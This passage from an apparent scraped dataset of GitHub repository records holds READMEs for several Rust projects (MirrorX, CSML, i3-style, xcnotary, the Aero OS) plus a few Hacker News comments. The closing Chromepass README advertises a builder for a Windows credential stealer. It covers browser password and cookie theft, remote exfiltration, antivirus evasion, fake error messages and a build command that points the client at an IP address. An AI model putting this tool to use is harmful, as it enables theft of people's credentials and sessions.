**(\u4ee5\u7ba1\u7406\u5458\u8eab\u4efd\u8fd0\u884c)**\n ```PowerShell\n PS > [Environment]::SetEnvironmentVariable('MIRRORX_MEDIA_LIBS_PATH', '\u4f60\u7684\u4ea7\u7269\u89e3\u538b\u8def\u5f84' , 'Machine')\n ```\n\n4. 
\u4ee5 Debug \u6a21\u5f0f\u8fd0\u884c\n\n```console\ncargo tauri dev\n```\n\n## \u5173\u4e8e\u9884\u7f16\u8bd1\u7684\u591a\u5a92\u4f53\u5e93\n\n\u4e3a\u4e86\u52a0\u901f\u7f16\u8bd1\u8fc7\u7a0b\uff0c\u6211\u4eec\u5efa\u7acb\u4e86 [MirrorX-Desktop/media_libraries_auto_build](https://github.com/MirrorX-Desktop/media_libraries_auto_build) \u6765\u81ea\u52a8\u5316\u548c\u900f\u660e\u5316\u6784\u5efa\u8fd9\u4e9b\u4f9d\u8d56\u5e93\u3002\u5305\u62ec [FFmpeg](https://git.ffmpeg.org/ffmpeg.git) \u3001libx264\uff08[Windows](https://github.com/ShiftMediaProject/x264.git), [MacOS](https://code.videolan.org/videolan/x264.git)\uff09\u3001libx265\uff08[Windows](https://github.com/ShiftMediaProject/x265.git), [MacOS](https://bitbucket.org/multicoreware/x265_git.git)\uff09\u3001libopus\uff08[Windows](https://github.com/ShiftMediaProject/opus.git), [MacOS](https://github.com/xiph/opus.git)\uff09 \u548c MFXDispatch\uff08\u53ea\u7528\u4e8e [Windows](https://github.com/ShiftMediaProject/mfx_dispatch.git)\uff09\u3002\u4f60\u53ef\u4ee5\u5728 [MirrorX-Desktop/media_libraries_auto_build](https://github.com/MirrorX-Desktop/media_libraries_auto_build) \u6d4f\u89c8 [\u5de5\u4f5c\u6d41](https://github.com/MirrorX-Desktop/media_libraries_auto_build/tree/main/.github/workflows) \u4ee5\u83b7\u53d6\u66f4\u591a\u7ec6\u8282\u3002\n\n\u5f53\u7136\uff0c\u4f60\u4e5f\u5b8c\u5168\u53ef\u4ee5\u6839\u636e\u6211\u4eec\u7684 [\u5de5\u4f5c\u6d41](https://github.com/MirrorX-Desktop/media_libraries_auto_build/tree/main/.github/workflows) \u6765\u81ea\u884c\u6784\u5efa\u8fd9\u4e9b\u4f9d\u8d56\u5e93\u3002\n\n## \u622a\u56fe\n\n
## Thanks\n\n### Thanks to these amazing open-source projects that make MirrorX possible.\n\n(In no particular order; only some projects are listed here. Thanks to the authors of every library we depend on in Cargo.toml and package.json.)\n\n1. [Rust](https://github.com/rust-lang/rust)\n2. [Tokio](https://github.com/tokio-rs/tokio)\n3. [FFMPEG](https://ffmpeg.org)\n4. [serde](https://github.com/serde-rs/serde)\n5. [ring](https://github.com/briansmith/ring)\n6. [egui](https://github.com/emilk/egui)\n7. [windows-rs](https://github.com/microsoft/windows-rs)\n8. [sveltekit](https://github.com/sveltejs/kit)\n9. [daisyUI](https://github.com/saadeghi/daisyui)\n10. [tailwindcss](https://github.com/tailwindlabs/tailwindcss)\n11. [ShiftMediaProject](https://github.com/ShiftMediaProject)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "CSML-by-Clevy/csml-engine", "link": "https://github.com/CSML-by-Clevy/csml-engine", "tags": ["rust", "interpreter", "language", "chatbot", "csml", "programming-language"], "stars": 653, "description": "CSML is an easy-to-use chatbot programming language and framework.", "lang": "Rust", "repo_lang": "", "readme": "
# CSML

First programming language dedicated to building chatbots.

Key Features \u2022 Example \u2022 Getting started \u2022 Additional Information

Try CSML online: https://play.csml.dev

[CSML (Conversational Standard Meta Language)](https://csml.dev) is both a domain-specific programming language and chatbot engine, designed to make it easy to develop complex chatbots.\n\nWith a very expressive and text-only syntax, CSML flows are easy to understand, making it easy to deploy and maintain conversational agents. CSML handles short and long-term memory slots, metadata injection, and connecting to any third party API or injecting arbitrary code in any programming language thanks to its powerful runtime APIs.\n\n## Key Features\n\n* Text-only, expressive syntax, easy to learn and develop complex chatbot scenarios with\n* Rich and extensible conversational components such as Carousel, Image, Video, Button, Card, Input, Calendar...\n* Built-in short-term and long-term memory slots: no more complex state machine boilerplate\n* Portable, fast, and easy to deploy: it only requires a standard MongoDB, PostgreSQL or SQLite database\n* Vibrant community of over 20,000 active CSML developers\n\n## Example\n\n```cpp\nstart:\n  say \"Hi, nice to meet you, I'm a demo bot \ud83d\udc4b\"\n  if (name) {\n    say \"I already know you \ud83d\ude09\"\n    goto known\n  }\n  else \n    goto name\n\nname:\n  say Question(\n    \"I'd like to know you better, what's your name?\",\n    buttons=[\n      Button(\"I'm anonymous \ud83d\ude0e\", accepts=[\"No\", \"Nope\"]) as anonBtn\n    ],\n  )\n  hold\n  if (event.match(anonBtn)) {\n    remember name = \"anon\"\n  } else {\n    remember name = event\n  }\n  goto known\n\nknown:\n  if (name == \"anon\")\n    say \"...but I know you don't want to say too much about yourself!\"\n  else \n    say \"You are {{name}}!\"\n  goto end\n```\n\nThe full documentation is available at https://docs.csml.dev/language.\n\n# Getting Started\n\nThe simplest way to get started with CSML is to use CSML Studio, a free online development environment with everything already set up to start creating bots right away, directly in your browser.\n\nTo get started with CSML Studio: https://studio.csml.dev\n\nCSML Studio gives you a free playground to experiment with the language as well as options to deploy your chatbots at scale in one click.\n\n## Self-hosted / cloud / local installation\n\nCSML is available as a self-hostable web server that you can easily install with one of the options below.\n\nNote that you will need a database. 
The default choice is **MongoDB**, but **Amazon DynamoDB**, **PostgreSQL** and **SQLite**\nare also available by choosing the `mongodb`, `dynamodb`, `postgresql` or `sqlite` engine DB type with a slightly different set of environment variables.\n\nBefore you start, make sure that you have the environment set with the following options:\n\n```\nENGINE_DB_TYPE=mongodb # must be one of mongodb|dynamodb|postgresql|sqlite\n\n# for mongodb\nMONGODB_URI=mongodb://username:password@localhost:27017\nMONGODB_DATABASE=csml\n\n# for postgresql\nPOSTGRESQL_URL=postgres://user:password@hostname:port/database\n\n# for sqlite\nSQLITE_URL=csml.db\n\n# for dynamodb (requires S3 for storage of large items)\nAWS_ACCESS_KEY_ID= # or use a local IAM role\nAWS_SECRET_ACCESS_KEY= # or use a local IAM role\nAWS_REGION=\nAWS_DYNAMODB_ENDPOINT= # optional, defaults to the dynamodb endpoint for the given region.\nAWS_DYNAMODB_TABLE=\nAWS_S3_ENDPOINT= # optional, defaults to the S3 endpoint for the given region\nAWS_S3_BUCKET=\n\n# CSML Server configuration\nENGINE_SERVER_PORT=5000\nENGINE_SERVER_API_KEYS=someAuthKey4CsmlServer,someOtherAuthKey\n\n# Other optional engine configuration\nENGINE_ENCRYPTION_SECRET=some-secret-string # if not set, data will not be stored encrypted\nTTL_DURATION=30 # auto-remove chatbot user data after X days\nLOW_DATA_MODE=true # do not store contents of sent/received messages\nDISABLE_SSL_VERIFY=false # reach trusted endpoints with known invalid certificates\nDEBUG=true # print debug output in console\nCSML_LOG_LEVEL=error # print log output in stderr. Possible values are error, warn, info, debug, trace.\nMODULES_URL= # default module repository base url\nMODULES_AUTH= # default module auth token\n```\n\n### Deploy to Heroku\n\n[Deploy to Heroku button]\n\n### Using a ready-to-use binary (Linux and MacOS only)\n\nThe easiest way to launch a CSML Engine on your own machine is to use one of our pre-built, optimized binaries (available for both MongoDB and Amazon DynamoDB). These binaries are available as executables on each of CSML's releases since v1.3.0.\n\nFollow along with the installation guide (for Ubuntu, but the process will be similar on other operating systems) in this blog post: https://blog.csml.dev/how-to-install-a-self-hosted-csml-engine-on-ubuntu-18-04/\n\nTo download the latest CSML Server binaries, [head over to the latest release](https://github.com/CSML-by-Clevy/csml-engine/releases/latest) and make sure to download the right version for your architecture.\n\n**Mac users**: upon first execution of this binary, Mac will probably open a warning about the application not being signed ([more info from Apple](https://developer.apple.com/documentation/xcode/notarizing_macos_software_before_distribution)). As this is not intended as a widely-distributed application, we decided to not go through the notarization process for now, but you can safely ignore that warning! However, if you prefer, you can always [build this package from source](#with-rust-from-source).\n\n### With Docker\n\nWe provide a docker image for easy self-hosted usage.\n\n```\ndocker pull clevy/csml-engine\n```\n\nTo get started with CSML Engine on Docker: https://github.com/CSML-by-Clevy/csml-engine-docker\n\n### With Rust, from source\n\nCSML is built in [Rust](https://www.rust-lang.org/). You don't need to know any Rust to run it though! 
Make sure you are running Rust v1.46+ and that you have openssl installed on your machine (or an equivalent for your Linux distribution, such as libssl), then run:\n\n```\ncd csml_server\n\n# for use with MongoDB\ncargo build --release --features csml_engine/mongo\n\n# for use with Amazon DynamoDB\ncargo build --release --features csml_engine/dynamo\n```\n\nAfter that, execute your build (by default under ./target/release/csml_server) and visit http://localhost:5000 for some request examples.\n\n### With Node.js\n\nThis repository provides Node.js bindings of this Rust library. To use this library in a Node.js project, you will need to build it from source. There are a few requirements:\n\n- Current Rust Stable version (v1.61.0 and above)\n- Node.js LTS\n- cargo-cp-artifact v0.1.6 ([required dependencies](https://www.npmjs.com/package/cargo-cp-artifact))\n- libssl-dev (or equivalent for your architecture: openssl-dev, libssl-devel...)\n\nTo compile CSML Engine into a [native node module](https://nodejs.org/api/addons.html), run:\n\n```shell\ngit clone https://github.com/CSML-by-Clevy/csml-engine csml\ncd csml/bindings/node/native\nnpm run build -- --release\n```\n\n> NB: you can build specifically for MongoDB, DynamoDB, SQLite or PostgreSQL by using one of the specialized scripts (e.g. `npm run build:mongodb`) in the [package.json](./bindings/node/native/package.json).\n\nThis method will output this native file: `csml/bindings/node/native/index.node` that you can simply `require()` (or `import`) in your project. For more details about how to use this module in your own projects, you can have a look at [our implementation for Docker version](https://github.com/CSML-by-Clevy/csml-engine-docker/blob/master/app/server.js).\n\nPlease note that if you plan to deploy your project on a different architecture, you will need to recompile the project on that architecture. We recommend using git submodules if you need to integrate CSML Engine in your own Node.js projects.\n\n## REST API documentation\n\nCSML Server's HTTP REST API documentation is available in OpenAPIv3 format: [swagger.yaml](./csml_server/swagger.yaml). To read this file easily, you can open it in [Swagger Editor](https://editor.swagger.io).\n\n## Additional Information\n\n### Play with the language\n\n* [Studio] - Create and deploy your chatbot in a matter of minutes.\n* [Playground] - Test and learn CSML in your browser.\n\n[Studio]: https://studio.csml.dev\n[Playground]: https://play.csml.dev\n\n### Getting Help\n\n* [Slack] - The official CSML community.\n* [CSML Documentation](https://docs.csml.dev) - Getting started.\n\n[Slack]: https://csml-by-clevy.slack.com/join/shared_invite/enQtODAxMzY2MDQ4Mjk0LWZjOTZlODI0YTMxZTg4ZGIwZDEzYTRlYmU1NmZjYWM2MjAwZTU5MmU2NDdhNmU2N2Q5ZTU2ZTcxZDYzNTBhNTc\n\n### Information\n\n* [Release notes](https://updates.csml.dev/) - Stay up to date.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "altdesktop/i3-style", "link": "https://github.com/altdesktop/i3-style", "tags": ["i3", "i3wm", "sway", "swaywm"], "stars": 652, "description": "\ud83c\udfa8 Make your i3 config a little more stylish.", "lang": "Rust", "repo_lang": "", "readme": "# i3-style\n\nMake your [i3](http://i3wm.org) config a little more stylish.\n\n## About\n\n`i3-style` applies a theme to your i3 config file to change the colorscheme of the window decorations and the different parts of i3bar. 
It's designed especially for people who make frequent changes to their colorscheme to get things just right.\n\n* Easy to try out new themes right after you install.\n* Themes are easy to read, modify, and share.\n* Modifies your theme in place - extra template files are not needed.\n\n[Chat](https://discord.gg/UdbXHVX)\n\n## Installing\n\nIf you have a Rust toolchain available, you can install with Cargo:\n\n    cargo install i3-style\n\nOtherwise, check the [releases](https://github.com/acrisci/i3-style/releases) page where I post precompiled binaries.\n\n## Usage\n\nJust call `i3-style` with the name of the theme you want to try and where you want to write the config file to. i3-style will look for your config in the default place and apply the theme.\n\n    i3-style solarized -o ~/.config/i3/config --reload\n\nCheck the `themes` directory for the list of built-in themes.\n\n    i3-style ~/.config/i3/solarized.yaml -o ~/.config/i3/config\n\nJust keep doing that until you get it perfect (which might be never).\n\n## Send us themes!\n\nDo you have a cool colorscheme in your config file that you want to share with other people? i3-style can automatically convert it to a theme file:\n\n    i3-style --to-theme ~/.config/i3/config -o my-theme.yaml\n\nIf you have a new theme, or made an improvement to an existing theme, please make a pull request adding your theme to the `themes` directory!\n\n## License\n\nThis work is available under a FreeBSD License (see LICENSE).\n\nCopyright \u00a9 2013, Tony Crisci\n\nAll rights reserved.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "oconnor663/duct.rs", "link": "https://github.com/oconnor663/duct.rs", "tags": [], "stars": 651, "description": "a Rust library for running child processes", "lang": "Rust", "repo_lang": "", "readme": "# {{crate}}.rs [![Actions Status](https://github.com/oconnor663/duct.rs/workflows/tests/badge.svg)](https://github.com/oconnor663/duct.rs/actions) [![crates.io](https://img.shields.io/crates/v/duct.svg)](https://crates.io/crates/duct) [![docs.rs](https://docs.rs/duct/badge.svg)](https://docs.rs/duct)\n\n{{readme}}\n", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "akeru-inc/xcnotary", "link": "https://github.com/akeru-inc/xcnotary", "tags": ["macos", "osx", "catalina", "notarization", "swift", "objc", "objectivec", "rust"], "stars": 650, "description": "the missing macOS app notarization helper, built with Rust", "lang": "Rust", "repo_lang": "", "readme": "# `xcnotary` is no longer needed!\n\nUse `xcrun notarytool --wait` as described in Apple's docs: [Customizing the notarization workflow](https://developer.apple.com/documentation/security/notarizing_macos_software_before_distribution/customizing_the_notarization_workflow#3087734)\n\nWith a concise example given here: https://github.com/akeru-inc/xcnotary/issues/22#issuecomment-1179170957\n\n\n\n---\n\n\n\n\n![logo](/docs/images/logo.png)\n\n### ~~the missing macOS app notarization helper, built with Rust~~\n\n# About\n\n[Notarizing a macOS app](https://developer.apple.com/documentation/xcode/notarizing_macos_software_before_distribution) involves a series of manual steps, including zipping a bundle, uploading it to Apple, and polling the notarization service.\n\n`xcnotary` automates these steps for you. 
It:\n\n- Attempts to fail fast if necessary, performing several checks on your target before uploading it to Apple.\n- Zips the input if it is an .app bundle.\n- Submits the input to the notarization service, and polls until completion. This step typically takes a few minutes.\n- In case of success, attaches the notarization ticket to the target, enabling the app to pass Gatekeeper on first run even without an Internet connection.\n- In case of failure, fetches the error log from Apple and outputs it to `stderr`.\n- Returns a zero/non-zero exit code for easy CI integration.\n\n![Notarization](/docs/images/notarize.png)\n\n# Installation\n\n### Homebrew\n\n```sh\n# Install\nbrew install akeru-inc/tap/xcnotary\n\n# Upgrade\nbrew update\nbrew upgrade akeru-inc/tap/xcnotary\n```\n\n# Usage\n\nTo perform various code signing checks on the input without submitting:\n\n```sh\nxcnotary precheck <path to .app/.dmg/.pkg>\n```\n\nTo perform code signing checks, submit to the notarization service, and block waiting for the response:\n\n```sh\nxcnotary notarize <path to .app/.dmg/.pkg> \\\n  --developer-account <developer account email> \\\n  --developer-password-keychain-item <keychain item name> \\\n  [--provider <provider short name>]\n  [--no-precheck]\n```\n\nSupported inputs:\n\n- \u2705 .app bundles\n- \u2705 .dmg disk images\n- \u2705 .pkg installer packages\n\n### Specifying the password keychain item\n\nThis tool does not handle your Apple Developer password. Instead, Xcode's helper `altool` reads an app-specific Apple Developer ID password directly from the keychain. See [the documentation](https://developer.apple.com/documentation/xcode/notarizing_macos_software_before_distribution/customizing_the_notarization_workflow#3087734) for `xcrun altool --store-password-in-keychain-item` to set up a suitable keychain item.\n\n### Specifying the developer team\n\nThe optional `--provider` argument should be specified if the developer account is associated with more than one team. This value can be obtained by running the following command and noting the \"ProviderShortname\" displayed.\n\n```sh\nxcrun altool --list-providers -u \"$DEVELOPER_ACCOUNT_USERNAME\" -p \"@keychain:$PASSWORD_KEYCHAIN_ITEM\"\n```\n\n### Required network access\n\n- Xcode's `altool` will connect to several Apple hosts as outlined in [the documentation](https://developer.apple.com/documentation/xcode/notarizing_macos_software_before_distribution/customizing_the_notarization_workflow).\n\n- When notarization fails, `xcnotary` will connect to `https://osxapps-ssl.itunes.apple.com/` on port 443 to retrieve the failure log.\n\n### Service response\n\nApple [documentation](https://developer.apple.com/documentation/xcode/notarizing_macos_software_before_distribution/customizing_the_notarization_workflow) advises: \"Always check the log file, even if notarization succeeds, because it might contain warnings that you can fix prior to your next submission.\"\n\n`xcnotary` will fetch and display the notarization service response upon completion.\n\n\n# Bundle pre-checks\n\n`xcnotary` attempts to check the input for some [common notarization issues](https://developer.apple.com/documentation/xcode/notarizing_macos_software_before_distribution/resolving_common_notarization_issues) before uploading it to Apple. 
While not foolproof, these checks may potentially save you minutes waiting for a response only to fail due to an incorrect code signing flag.\n\n![Bundle pre-check](/docs/images/precheck.png)\n\nWhen the input is an app bundle, the following checks will be performed:\n\n- \u2705 Bundle being signed with a Developer ID certificate and not containing unsigned items.\n- \u2705 Bundle being signed with a secure timestamp.\n- \u2705 Bundle *not* having the get-task-allow entitlement.\n- \u2705 Bundle having hardened runtime enabled.\n\nWhen the input is a *.dmg* or a *.pkg*, only the Developer ID signing check is performed, i.e. the only check that can be performed at the moment without extracting the contents. In your workflow, you may want to run `xcnotary precheck` on your bundle target before packaging it.\n\nIn rare cases, it may be helpful to troubleshoot code signing issues directly using the notarization service response. To do so, specify `--no-precheck` when invoking `xcnotary notarize`.\n\n# Building for notarization\n\nThe following examples set various necessary build flags, such as code signing with a \"secure timestamp.\"\n\n### Bundles\n\n```sh\nxcodebuild \\\n  -target <target> \\\n  -scheme <scheme> \\\n  -configuration Release \\\n  -derivedDataPath .xcodebuild \\\n  \"CODE_SIGN_IDENTITY=Developer ID Application: <team name>\" \\\n  \"OTHER_CODE_SIGN_FLAGS=--timestamp --options=runtime\" \\\n  CODE_SIGN_INJECT_BASE_ENTITLEMENTS=NO \\\n  CODE_SIGN_STYLE=Manual\n```\n\n`CODE_SIGN_IDENTITY` should match the corresponding Keychain certificate.\n\nNote that `--options=runtime` will have the effect of opting in your binary to the hardened runtime environment. You most likely want to first manually enable the \"Hardened Runtime\" capability in Xcode's target settings > \"Signing and Capabilities\" and make sure your application functions as expected. There, you may also add any entitlements to relax the runtime restrictions.\n\n### Packages\n\n```sh\npkgbuild \\\n  --component <component path> \\\n  --sign \"Developer ID Installer: <team name>\" \\\n  --timestamp \\\n  <output package path>\n```\n\n### Disk images\n\nCodesign after creating the DMG:\n\n```sh\ncodesign -s \"Developer ID Application: <team name>\" <path to DMG>\n```\n\n# Additional Information\n\n- [Change Log](CHANGELOG.md)\n\n- Feature requests/comments/questions? Write: david@akeru.com\n", "readme_type": "markdown", "hn_comments": "I love this. Amazing work \u2014 thanks for making this process easier. Neat! I was just about to need something like this, for building native app bundles for druid[1]. I'll open an issue, but do you have any interest in exposing this as a library? [1] https://github.com/xi-editor/druid (The author.) I had originally written a version of this in Python for my own use, and recently thought of rewriting it in Rust as a learning experience. What I found is that writing a CLI in Rust is an absolute breeze, in part due to excellent documentation and the tooling, and also thanks to various well-maintained crates, such as StructOpt [1] to parse command line arguments of any complexity, or indicatif [2] to show animated progress. [1] https://github.com/akeru-inc/xcnotary/blob/11649e49892d81754... [2] https://github.com/akeru-inc/xcnotary/blob/11649e49892d81754... Very cool utility. 
Rust seems like an odd choice since there's little processing work to be done other than the zipping - which could be outsourced to the \"zip\" tool - but I guess a learning exercise is a learning exercise. There's also a nice GUI app called \u201cSD Notary\u201d from a well-respected, long-time Mac app developer (Late Night Software, developer of Script Debugger): https://latenightsw.com/sd-notary-notarizing-made-easy/ Aside: GitHub seems to dislike your animated SVG for some reason, since it won't play unless I open it manually. I think sanitize=true does that; try hosting it somewhere else? Very cool work! I just manually implemented this in a Python script. Does it support other platforms? Will it run on Linux? Thank you for building this. The notarization process is navigable but baroque, especially from the command line. fish shell's notarization script: https://github.com/fish-shell/fish-shell/blob/master/build_t...", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Andy-Python-Programmer/aero", "link": "https://github.com/Andy-Python-Programmer/aero", "tags": ["operating-system", "rust", "aero", "unix", "uefi", "hacktoberfest"], "stars": 650, "description": "Aero is a new modern, experimental, unix-like operating system following the monolithic kernel design. Supporting modern PC features such as long mode, 5-level paging, and SMP (multicore), to name a few.", "lang": "Rust", "repo_lang": "", "readme": "
# Aero\n\n**Aero** is a new modern, experimental, unix-like operating system written in Rust. \nAero follows the monolithic kernel design and is inspired by the Linux Kernel. \nAero supports *modern* PC features such as Long Mode, 5-level paging, \nand SMP (multicore), to name a few.\n\n![workflow](https://github.com/Andy-Python-Programmer/aero/actions/workflows/build.yml/badge.svg)\n[![lines_of_code](https://tokei.rs/b1/github/Andy-Python-Programmer/aero)](https://github.com/Andy-Python-Programmer/aero)\n[![discord](https://img.shields.io/discord/828564770063122432)](https://discord.gg/8gwhTTZwt8)\n\n**Is this a Linux distribution?**\nNo, Aero runs its own kernel that does *not* originate from Linux and does not share any source code or binaries with the Linux kernel.\n\n**Official Discord Server**: https://discord.gg/8gwhTTZwt8\n\n# Screenshots\n\n
*Running DWM, mesa-demos and Alacritty in Aero!*\n\n# Features\n- 64-bit higher half kernel\n- 4/5 level paging\n- Preemptive per-cpu scheduler\n- Modern UEFI bootloader\n- ACPI support (ioapic, lapic)\n- Symmetric Multiprocessing (SMP)\n- On-demand paging\n\n# Goals\n\n* Creating a modern, safe, beautiful and fast operating system.\n* Targeting modern 64-bit architectures and CPU features.\n* Good source-level compatibility with Linux so we can port programs over easily.\n* Making a usable OS which can run on real hardware, not just on emulators or virtual machines.\n\n# How to Build and Run Aero\n\nPlease make sure you have a **unix-like** host system before building \nAero. If you are using Windows, it's highly recommended to use WSL 2.\n\n## Dependencies\n\nBefore building Aero, you need the following things installed:\n- `rust` (should be the **latest nightly**)\n- `nasm`\n- `qemu` (optional: required if you want to run it in the Qemu emulator)\n\nIf you are building Aero with sysroot, run the following helper script to install additional dependencies.\n```sh\n# make sure to run the script with root privileges!\n./tools/deps.sh\n```\nYou can optionally set the environment variable `VERBOSE` to `true`, which will pass through the output of your package manager for troubleshooting.\n```sh\nVERBOSE=true ./tools/deps.sh\n```\n\nNote: If your host operating system is not in the list below, you will need to determine the dependency packages' names for your package manager (contributions to this tool are welcome!)\n- Arch Linux/based (pacman)\n- Debian Linux/based (apt)\n- macOS (homebrew)\n\n\n## Hardware\n\nThe following are *not* requirements but are *recommendations*:\n- ~15GB of free disk space\n- \\>= 8GB RAM\n- \\>= 2 cores\n- Internet access\n\nBeefier machines will lead to much faster builds!\n\n## Getting the source code\n\nThe very first step to work on Aero is to clone the repository:\n```shell\n$ git clone https://github.com/Andy-Python-Programmer/aero\n$ cd aero\n```\n\n## Building Aero\n\nAero uses a custom build system that wraps `cargo` and takes care of building the kernel and\nuserland for you. It also builds the initramfs and disk image for you.\n\nThe main command we will focus on is `./aero.py`. The source code can be found in the\nroot of the repository and, as the file name states, it is written in Python.\n\nBy default if you run `./aero.py` without any arguments it will build the kernel and userland\nin release mode with debug symbols and run it in QEMU. You can configure the behavior of the \nbuild system though. If you want to, you can use the `--help` option to read a brief description \nof what it can do.\n\nThe build system acknowledges a few different build modes, which cannot be used together.\nThey are: `--clean`, `--check`, `--test` and `--document`.\n\n- `--clean` option will clean all the build outputs.\n- `--check` will build the kernel and userland using cargo's `check` command;\n  this build mode will not produce a disk image. If you want one without actually\n  running Aero in the emulator, read ahead.\n- `--test` will run the built-in Aero test suite\n- `--document` will generate web-based docs using cargo's `doc` command\n- `--sysroot` will build the full userland sysroot. If not passed, then the sysroot will only contain \nthe `aero_shell` and the `init` binaries. \n\n    **Note**: This command will require a relatively large amount of storage \nspace. 
You may want to have upwards of 10 or 15 gigabytes available if building with full sysroot.\n\nEach of these modes can be used with additional flags that will alter the behavior in different\nways; some of them will not work for some of these modes - for example, the `--la57` option\nwill not have any effect when you are simply checking or documenting the build.\n\n- `--debug` toggles off the release build flag when calling cargo.\n\n    **Summary**: If the `--debug` flag is not passed then it will build Aero in release mode\n    and debug symbols will be available. On the other hand, if the debug flag is passed\n    then it will be built in debug mode and debug symbols will still be available. By default\n    Aero is built in release mode (with debug symbols) since it generates faster and smaller\n    binaries which are easier to test.\n- `--no-run` prevents running the built disk image in the emulator\n- `--bios` lets you choose the firmware the emulator will use when booting Aero,\n  currently supported values are: `legacy` and `uefi`\n- `--features` accepts a single comma-separated list of kernel crate features, please\n  keep in mind that there cannot be spaces in between the values\n- `--target` lets you override the target architecture for which the kernel is built,\n  currently the default value is `x86_64-aero_os`\n- `--la57` tells the emulator to use 5 level paging, if it supports it\n\nThe built disk image is stored in the `build` directory under the name `aero.iso`. Both the\ndisk root and initramfs root are preserved in case you want to inspect them manually.\n\n## Running Aero in an emulator\n\nIf you haven't used the `--no-run` option and you aren't using the `--check` or `--document` build\nmode, the build system will run Aero in the emulator for you.\n\n## Nightly Images\n\nWant to give Aero a shot without building it? You can go to the [latest job](https://github.com/Andy-Python-Programmer/aero/actions/workflows/build.yml?query=is%3Asuccess+branch%3Amaster) and download the latest nightly image (`aero.iso`), under artifacts.\n\n# Contributing\n\nContributions are absolutely, positively welcome and encouraged! Check out [CONTRIBUTING.md](CONTRIBUTING.md) for the contributing guidelines for aero.\n\n# License\n\nAero is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version. See the [LICENSE](LICENSE) file for license rights and limitations.\n", "readme_type": "markdown", "hn_comments": "The Readme is only about building it. A list of features (i.e. what it can run) would be nice. I can't believe you're 14. That's so impressive. Does your programming ability translate over to other subjects in school? Are you ahead of your peers in those areas as well? At 14 I played with a stick. You build an OS. Incredible. Quite impressed. 
Would be great to know which resources the lad used for learning how to code it.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "darkarp/chromepass", "link": "https://github.com/darkarp/chromepass", "tags": ["computer-engineering", "hacking", "hacking-tool", "password-cracker", "password", "passwords", "google-chrome", "hack", "hacks", "chromepass", "cookies", "av-detection", "hacking-chrome", "python", "hacktoberfest", "hacktoberfest2021", "hacktoberfest-accepted", "phishing", "security"], "stars": 650, "description": "Chromepass - Hacking Chrome Saved Passwords", "lang": "Rust", "repo_lang": "", "readme": "
# Chromepass - Hacking Chrome Saved Passwords and Cookies

View Demo \u00b7 Report Bug \u00b7 Request Feature

## Table of Contents\n\n* [About the Project](#about-the-project) \n\t* [AV Detection](#av-detection)\n* [Getting started](#getting-started)\n * [Prerequisites](#dependencies-and-requirements)\n * [Installation](#installation)\n* [Usage](#usage)\n* [Email](#email)\n* [Errors, Bugs and Feature Requests](#errors-bugs-and-feature-requests)\n* [Learn More](#learn-more)\n* [License](#license)\n* [Demo](#demo)\n---\n## About The project\nChromepass is a Python-based console application that generates a Windows executable with the following features:\n\n - Decrypt Google Chrome, Chromium, Edge, Brave, Opera and Vivaldi saved passwords and cookies\n - Send a file with the login/password combinations and cookies remotely (http server or email)\n - Undetectable by AV if done correctly\n - Custom icon\n - Custom error message\n - Customize port\n\n---\n\n### AV Detection! \n\nThe new client build methodology practically ensures a 0% detection rate, even without AV-evasion tactics. If this becomes false in the future, some methods will be implemented to improve AV evasion. \n\nAn example of recent scans (note: within 10-12 hours we go from 0-2 detections to 32 detections, so run the analysis on your own builds): \n * [VirusTotal Scan 1](https://www.virustotal.com/gui/file/71d5600e2e9dbdc446aeca554d1f033a69d6f5cf5a7565d317cc22329c084f51/detection)\n * [VirusTotal Scan 2](https://www.virustotal.com/gui/file/f674032061e3d5639d168d68d60a8ff0a53bc249705ec9eb032a385015c20a42/detection)\n * [VirusTotal Scan 3](https://www.virustotal.com/gui/file/462de7fc96d2db7af3400b23d32a75d28909c19e756678f0d2f261efde705165/detection)\n * [VirusTotal Scan 4](https://www.virustotal.com/gui/file/d71a48fb7dc02a14823ceeedd5808e13b6734873f7b1b5c09db433b59eab256e/detection)\n\n ---\n## Getting started\n\n### Dependencies and Requirements\n\nThis is a very simple application, which uses only:\n\n* [Python] - Tested on python 3.9+\n\n>It is recommended to perform the installation inside a Windows VM. Some parts of the installation procedure might be affected by existing configurations. This was tested on a clean Windows 10 VM.\n\n### Installation\n\n>Chromepass requires Windows to compile! Support for Linux and macOS may be added soon.\n\n#### **Clone the repository**:\n```powershell\ngit clone https://github.com/darkarp/chromepass\n```\n>Note: As an alternative to cloning the repository, you can download the latest release, since the repository may be more bug-prone.\n\n### **Install the dependencies**:\n\nThe dependencies are checked and installed automatically, so you can just skip to [Usage](#usage). It's recommended that you use a clean VM, just to make sure there are no conflicts.\n\nIf you don't have the dependencies and your internet isn't fast, this will take a while. Go grab some coffee. \n\n---\n\n## Usage\n\nChromepass is very straightforward. Start by running:\n```powershell\npython create.py -h\n```\nA list of options will appear; they are self-explanatory.\n\nRunning without any parameters will build the server and the client connecting to `127.0.0.1`. \n\nA simple example of a build:\n```powershell\npython create.py --ip 92.34.11.220 --error --message 'An Error has happened'\n```\n\nAfter creating the server and the client, make sure you're running the server when the client is run.\n\nThe cookies and passwords will be saved in `json` files in a new folder called `data` in the same directory as the server, separated by IP address. 
